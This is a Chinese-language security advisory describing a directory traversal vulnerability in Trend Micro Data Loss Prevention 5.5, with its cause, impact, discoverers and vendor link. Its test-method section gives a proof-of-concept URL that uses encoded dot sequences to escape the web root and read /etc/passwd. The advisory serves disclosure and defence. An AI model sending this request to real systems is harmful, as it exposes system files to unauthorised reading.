Trend Micro Data Loss Prevention目录遍历漏洞

漏洞起因
输入验证错误
危险等级

 
影响系统
Trend Micro Data Loss Prevention 5.5
 
不受影响系统
 
危害
远程攻击者可以利用漏洞获得敏感文件信息。
 
攻击所需条件
攻击者必须访问Trend Micro Data Loss Prevention。
 
漏洞信息
Trend Micro Data Loss Prevention是一款趋势科技发行的数据外泄管理系统。
Trend Micro Data Loss Prevention不正确过滤用户提交的编码的目录遍历序列字符,攻击者可以提交恶意请求绕过WEB ROOT限制,以WEB权限查看系统文件内容。
 
测试方法
https://IP:8443/dsc//%c0%ae%c0%ae/%c0%ae%c0%ae/%c 0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%a e%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c 0%ae/%c0%ae%c0%ae/etc/passwd
 
厂商解决方案
目前没有详细解决方案提供:
http://us.trendmicro.com/us/products/enterprise/data-loss-prevention/index.html
 
漏洞提供者
Luis Martinez, Sergio Lopez,White Hat Consultores

发表评论?

0 条评论。

发表评论